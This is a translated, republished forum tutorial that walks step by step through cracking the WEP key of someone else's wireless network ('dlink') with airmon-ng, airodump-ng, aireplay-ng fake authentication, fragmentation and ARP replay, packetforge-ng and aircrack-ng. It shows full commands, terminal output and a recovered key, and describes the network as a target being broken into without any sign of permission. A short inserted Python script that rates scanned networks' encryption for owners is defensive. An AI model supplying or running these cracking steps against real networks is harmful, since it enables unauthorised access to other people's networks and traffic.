Wireless password cracking

Source: Internet  Published by: 眼药水 知乎  Editor: 程序博客网  Time: 2024/04/29 12:17

The original forum post is at: http://forum.ubuntu.org.cn/viewtopic.php?f=116&t=252764&start=0

1. Open a terminal and type: ifconfig
   You get the following output:
   [root@Archlinux ~]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1A:A0:FF:21:BF 
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:17

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

wlan0     Link encap:Ethernet  HWaddr 00:1B:77:D8:63:0C 
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:1078 errors:0 dropped:0 overruns:0 frame:0
          TX packets:752 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:303752 (296.6 Kb)  TX bytes:179166 (174.9 Kb)

2. In the terminal type: airmon-ng start wlan0
   You get the following output:
   [root@Archlinux ~]# airmon-ng start wlan0


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
2013    NetworkManager
2017    wpa_supplicant


Interface    Chipset        Driver

wlan0        Intel 3945ABG    iwl3945 - [phy0]
                (monitor mode enabled on mon0)

3. In the terminal type: kill 2013 2017   # kills the processes listed above that "could cause trouble" <# tested: you don't actually have to kill them!>

4. modprobe iwl3945    # the wireless driver shown in the output above

5. Open spoonwep and find the channel of the wireless network you want to crack: when spoonwep starts it automatically pops up a scan window; the number under the column labelled CH is the channel, usually 1, 6 or 11. What my scan showed is below (just one example; the scan actually turns up many):

BSSID     PWR  Beacons    #Data   ,#/s  CH    MB    ENC  CIPHER  AUTH  ESSID
AP'S MAC    -83  197+        133+    0     6     54e  wep   wep           dlink

BSSID     STATION         PWR       Rate      Lost    Packets    Probes
AP'S MAC      mac         -43       11e-1e      22+-     2000+    dlink

<Just an example; the values won't necessarily be these, and some of them keep changing>


# AP'S MAC: what I found here was 00:24:01:C0:0B:F8 (the MAC address of the target being cracked / broken into)
# 197+ and 133+ mean these numbers keep increasing ## after the crack, when my roommate was using this AP the Data count grew very fast, but
     before the crack it grew very slowly; this field changes again later
# the 6 under CH is the channel
# ENC is the encryption type, here WEP
# AUTH: note that this changes later (I can't really explain it; I'm just a user)
# ESSID is the name of the wireless network (chosen by its owner)

6. In the terminal: airmon-ng start mon0 6
   (step 2 printed the hint "(monitor mode enabled on mon0)"; 6 is the channel value)
   You get the following output:
[root@Archlinux ~]# airmon-ng start mon0 6
Process with PID 4162 (airodump-ng) is running on interface mon0
Process with PID 4170 (airodump-ng) is running on interface mon0


Interface    Chipset        Driver

wlan0        Intel 3945ABG    iwl3945 - [phy0]
mon0        Intel 3945ABG    iwl3945 - [phy0]
                (monitor mode enabled on mon2)
mon1        Intel 3945ABG    iwl3945 - [phy0]


7. Now start capturing packets (still in the terminal):
 type airodump-ng --ivs -w 333 -c 6 mon0

# note the two dashes before ivs;
"333" is an arbitrary name (you'll need it later);
 -c 6 fixes the channel to 6; mon0 is the interface enabled and found above

Note: after this you will see output similar to the spoonwep window just now. (Do not close this window.)
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:15:70:D2:0F:84   -1   0        0       34   12 158  -1   OPN              <length:  0>
 00:24:01:C0:0B:F8  -78  43     1108     1412   35   6  54e  WEP  WEP         dlink
 00:26:5A:AC:BC:D6  -83  20      871        0    0   6  54e  WPA2 CCMP   PSK  405
 00:15:70:D2:0F:78  -84   0       92       13    0   6  54   OPN              CMCC
 00:1D:0F:7E:01:E4  -84  24      860        0    0   6  54 . WEP  WEP         FR10313
 00:25:86:24:1F:86  -86   0        6        0    0   6  54 . WEP  WEP         F10-210
 00:0E:E8:DB:33:EB  -87   0      138        0    0  11  54   WPA  TKIP   PSK  ipTIME
 00:1B:2F:08:51:E6  -87   0        2        1    0  11  54 . WPA  TKIP   PSK  NETGEAR
 00:23:68:09:C9:CC  -85   0       31        7    0   6  54   OPN              CMCC
 00:22:B0:91:64:19  -85   0        6        0    0   6  54 . WPA2 CCMP   PSK  Karas
 00:27:19:9E:30:F6   -1   0        0        0    0  -1  -1                    <length:  0>

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:15:70:D2:0F:84  00:1B:77:94:AD:04  -87    6 - 1     19      188  CMCC
 (not associated)   00:22:FB:A4:DF:F4  -72    0 - 1      0       55
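The field explanations in step 5 and the scan table above are the material a network owner needs for an audit: which of the visible networks still run WEP, are open, or use WPA/TKIP, and therefore should be migrated to WPA2-CCMP or WPA3. The following Python script is an added example written from that defender's side; it is not part of the original post or of the aircrack-ng suite. It parses an airodump-ng style access-point table (the sample rows are constructed from the scan shown on this page, using the column order BSSID, PWR, RXQ, Beacons, #Data, #/s, CH, MB, ENC, CIPHER, AUTH, ESSID as airodump-ng prints it) and rates each network. The names AccessPoint, parse_scan, rate_encryption, weak_networks and summarize are my own.

```python
"""Rate the access points in an airodump-ng style scan table by encryption strength.

Added audit example (not from the original post). SCAN_TABLE is constructed
from the scan rows shown on the page; the parser assumes airodump-ng's
column order and its ENC / CIPHER / AUTH keywords.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: a subset of the scan rows shown earlier on the page.
SCAN_TABLE = """\
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:24:01:C0:0B:F8  -78  43     1108     1412   35   6  54e  WEP  WEP         dlink
 00:26:5A:AC:BC:D6  -83  20      871        0    0   6  54e  WPA2 CCMP   PSK  405
 00:15:70:D2:0F:78  -84   0       92       13    0   6  54   OPN              CMCC
 00:0E:E8:DB:33:EB  -87   0      138        0    0  11  54   WPA  TKIP   PSK  ipTIME
 00:22:B0:91:64:19  -85   0        6        0    0   6  54 . WPA2 CCMP   PSK  Karas
 00:27:19:9E:30:F6   -1   0        0        0    0  -1  -1                    <length:  0>
"""

# Keyword sets airodump-ng uses in the ENC, CIPHER and AUTH columns.
ENC_VALUES = {"OPN", "WEP", "WPA", "WPA2", "WPA3"}
CIPHER_VALUES = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP", "GCMP"}
AUTH_VALUES = {"PSK", "MGT", "SAE", "OPN", "SKA"}
MAC_RE = re.compile(r"([0-9A-F]{2}:){5}[0-9A-F]{2}", re.IGNORECASE)


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    data_frames: int
    enc: str
    cipher: str
    auth: str
    essid: str
    rating: str


def rate_encryption(enc: str, cipher: str) -> str:
    """Map the ENC/CIPHER pair to an audit verdict."""
    if not enc:
        return "unknown"        # hidden or not yet classified by the scanner
    if enc == "OPN":
        return "open"           # no encryption at all
    if enc == "WEP":
        return "broken"         # WEP keys are recoverable from captured traffic
    if enc == "WPA" or cipher == "TKIP":
        return "weak"           # WPA1 / TKIP are deprecated
    return "ok"                 # WPA2/WPA3 with CCMP or GCMP


def parse_scan(text: str) -> List[AccessPoint]:
    """Parse access-point rows; header, blank and station rows are skipped."""
    aps = []
    for line in text.splitlines():
        tokens = line.split()
        # Only rows that start with a MAC and carry the eight fixed columns.
        if len(tokens) < 8 or not MAC_RE.fullmatch(tokens[0]):
            continue
        bssid, _pwr, _rxq, _beacons, data, _rate, ch, _mb = tokens[:8]
        rest = tokens[8:]
        if rest and rest[0] == ".":      # airodump-ng's preamble/QoS marker after MB
            rest = rest[1:]
        enc = cipher = auth = ""
        if rest and rest[0] in ENC_VALUES:
            enc, rest = rest[0], rest[1:]
        if rest and rest[0] in CIPHER_VALUES:
            cipher, rest = rest[0], rest[1:]
        if rest and rest[0] in AUTH_VALUES:
            auth, rest = rest[0], rest[1:]
        essid = " ".join(rest)          # ESSIDs may contain spaces; keep the remainder
        aps.append(AccessPoint(bssid, int(ch), int(data), enc, cipher, auth,
                               essid, rate_encryption(enc, cipher)))
    return aps


def weak_networks(aps: List[AccessPoint]) -> List[AccessPoint]:
    """Networks an owner should migrate to WPA2-CCMP or WPA3."""
    return [ap for ap in aps if ap.rating in ("broken", "open", "weak")]


def summarize(aps: List[AccessPoint]) -> Dict[str, int]:
    """Count access points per rating, sorted by rating name."""
    counts: Dict[str, int] = {}
    for ap in aps:
        counts[ap.rating] = counts.get(ap.rating, 0) + 1
    return dict(sorted(counts.items()))


if __name__ == "__main__":
    found = parse_scan(SCAN_TABLE)
    for ap in weak_networks(found):
        print(f"{ap.bssid}  ch {ap.channel:>2}  {ap.enc:<5} {ap.cipher:<5} "
              f"{ap.essid!r}: {ap.rating}")
    print(summarize(found))
```

The parser is positional, matching the way airodump-ng lays out its columns, so an ESSID that happens to equal a cipher or auth keyword (for example a network literally named "PSK") would be swallowed as a column; a production audit tool should read airodump-ng's CSV output (the -w prefix writes one) instead of screen-scraping the terminal table.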

8. In the terminal type: aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0

# here -e is followed by the AP's ESSID
-a is followed by the AP's BSSID, i.e. the AP's MAC address
-h is followed by your own MAC address

You get the following output:

[root@Archlinux ~]# aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
14:48:53  Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6

14:48:53  Sending Authentication Request (Open System) [ACK]
14:48:53  Authentication successful
14:48:53  Sending Association Request [ACK]
14:48:53  Association successful :-) (AID: 1)

At this point the window you left open, the airodump-ng window, (probably) changes noticeably.
If the change is obvious, then once the Data count has grown to 10000-odd you can run the following command directly to crack it:
_______________________________________________________________________________

[root@Archlinux ~]# aircrack-ng -n 64 -b 002401C00BF8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.


                                 Aircrack-ng 1.0


                 [00:00:04] Tested 1562761 keys (got 1412 IVs)

   KB    depth   byte(vote)
    0   62/ 63   F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
    1   27/  1   FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
    2   22/  2   98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
    3   17/ 40   38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
    4   14/ 40   F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)

Failed. Next try with 5000 IVs.
# Mine did not grow fast (only 1412), so it failed here; continue below (it can still be cracked :-) haste makes waste!
_________________________________________________________________________________________________________________
9、aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0

[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon0
15:07:10  Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 5
15:07:11  mon0 is on channel 5, but the AP uses channel 6
[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon1
15:07:29  Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30  Waiting for a data packet...
Read 2691 packets...

        Size: 328, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:24:01:C0:0B:F8
          Dest. MAC  =  01:00:5E:7F:FF:FA
         Source MAC  =  00:24:01:C0:0B:F8

        0x0000:  0842 0000 0100 5e7f fffa 0024 01c0 0bf8  .B....^...$....
        0x0010:  0024 01c0 0bf8 d066 327e 0200 df2e 869e  .$.....f2~......
        0x0020:  ec2f 54f3 1607 352f b790 45f2 414d 03c2  ./T...5/..E.AM..
        0x0030:  b9ad de4a 12c1 8da4 a3ad 0d02 801b 35d4  ...J..........5.
        0x0040:  8911 ad85 e45f ac37 cfff f38b dc41 a600  ....._.7.....A..
        0x0050:  5b21 01cf 9838 d95c d6ef bedc b898 7ec6  [!...8./......~.
        0x0060:  0491 4035 cf43 622d bdfb de72 6964 0299  ..@5.Cb-...rid..
        0x0070:  f2da f200 d5be c5c7 1a59 7e16 d081 078f  .........Y~.....
        0x0080:  8f26 3710 dce0 4cb9 5e32 f043 7108 672a  .&7...L.^2.Cq.g*
        0x0090:  3fa2 e3f9 e7fd ef46 1e3a d911 dc9a 2d1d  ?......F.:....-.
        0x00a0:  1fa0 598a a787 36a0 8e5e ead1 abb8 96b1  ..Y...6..^......
        0x00b0:  a6f8 6525 83f5 9b33 1dbd 3fcb b37c 3e2f  ..e%...3..?..|>/
        0x00c0:  9462 9146 d4a9 0ee9 600d 312d 9b44 b6bb  .b.F....`.1-.D..
        0x00d0:  c5ec 2806 f1be 1b48 0a95 be99 d1c2 6928  ..(....H......i(
        --- CUT ---

Use this packet ?

Now choose y

Use this packet ? y

Saving chosen packet in replay_src-0111-150843.cap
15:09:17  Data packet found!
15:09:17  Sending fragmented packet
15:09:19  No answer, repeating...
15:09:19  Trying a LLC NULL packet
15:09:19  Sending fragmented packet
15:09:20  No answer, repeating...
15:09:20  Sending fragmented packet
15:09:22  No answer, repeating...
15:09:22  Trying a LLC NULL packet
15:09:22  Sending fragmented packet
15:09:23  No answer, repeating...
15:09:23  Sending fragmented packet
15:09:23  Got RELAYED packet!!
15:09:23  Trying to get 384 bytes of a keystream
15:09:23  Got RELAYED packet!!
15:09:23  Trying to get 1500 bytes of a keystream
15:09:23  Got RELAYED packet!!
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
[root@Archlinux ~]#

Note the key lines in the output above:
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

(After entering y the system starts sending data, the airodump-ng window reacts immediately and the Data count grows at once; the steps below are then unnecessary, and once Data reaches 15,000 aircrack-ng recovers the password.)

Continue below:

10. Type ls to see the names of the files just created, so they can be copied conveniently in a moment :-)

[root@Archlinux ~]# ls
333-01.ivs  Desktop    fragment-0111-150923.xor
333-02.ivs  Downloads  replay_src-0111-150843.cap
[root@Archlinux ~]#

 In the terminal type: packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h00:1B:77:D8:63:0C  -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w mrarp

You get:
[root@Archlinux ~]# packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h00:1B:77:D8:63:0C  -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w mrarp
Wrote packet to: mrarp

11. aireplay-ng -2 -r mrarp -x 1024 mon1
 # mon1 is used here; see for yourself why (in step 9 the working run was: aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:77:D8:63:0C mon1
15:07:29  Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30  Waiting for a data packet...
Read 2691 packets...   that was mon1)

[root@Archlinux ~]# aireplay-ng -2 -r mrarp -x 1024 mon1
No source MAC (-h) specified. Using the device MAC (00:1B:77:D8:63:0C)


        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:24:01:C0:0B:F8
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:1B:77:D8:63:0C

        0x0000:  0841 0201 0024 01c0 0bf8 001b 77d8 630c  .A...$......w.c.
        0x0010:  ffff ffff ffff 8001 437e 0200 769d a167  ........C~..v..g
        0x0020:  e1af 7926 ebca 352f b7cb 1002 53d7 59d3  ..y&..5/....S.Y.
        0x0030:  bb77 0e95 8732 d16a 2e18 0a49 0bd1 2acf  .w...2.j...I..*.
        0x0040:  c256 37aa                                .V7.

Use this packet ?
Choose y
You get:

Saving chosen packet in replay_src-0111-151709.cap
You should also start airodump-ng to capture replies.

Now the Data count in the airodump-ng window shoots up


12. Open another terminal and type:
ls
You get:
[root@Archlinux ~]# ls
333-01.ivs  Desktop    fragment-0111-150923.xor  replay_src-0111-150843.cap
333-02.ivs  Downloads  mrarp             replay_src-0111-151709.cap
[root@Archlinux ~]#
Type:
aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs (it is 02 because I closed the capture window once at the time, so ls shows two ivs files)

You get:

[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.


                                 Aircrack-ng 1.0


                 [00:00:04] Tested 1562761 keys (got 1412 IVs)

   KB    depth   byte(vote)
    0   62/ 63   F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
    1   27/  1   FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
    2   22/  2   98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
    3   17/ 40   38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
    4   14/ 40   F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)

Failed. Next try with 5000 IVs.  (Wrong file: I had closed the airodump-ng window once and then re-ran the capture command, which produced a second ivs file)

[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs     # reason as above
Opening 333-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 34551 ivs.





                                 Aircrack-ng 1.0


                 [00:00:00] Tested 154 keys (got 17607 IVs)

   KB    depth   byte(vote)
    0    0/  1   15(27136) 5A(23552) 7D(23040) A4(22784) A2(22528)
    1    3/  8   80(22272) E4(22272) 17(22016) 48(22016) 66(21760)
    2    1/  3   BE(23808) EE(23296) 1E(23040) 87(23040) 89(23040)
    3    0/  4   12(24832) 69(23552) 5B(23296) D0(23296) AE(23040)
    4    0/  2   06(24064) 7F(23296) AE(22272) 69(22016) DE(22016)

                         KEY FOUND! [ 15:80:59:12:06 ]
    Decrypted correctly: 100%


[root@Archlinux ~]#

And that is the password. 8)


13. It hasn't been easy reading this far, so
here is the best method:
open the spoonwep client and find the MAC address and channel to attack

In the terminal type: wesside-ng -i mon0 -v <target MAC>

Finally, to stop capturing, type:

 sudo airmon-ng stop mon0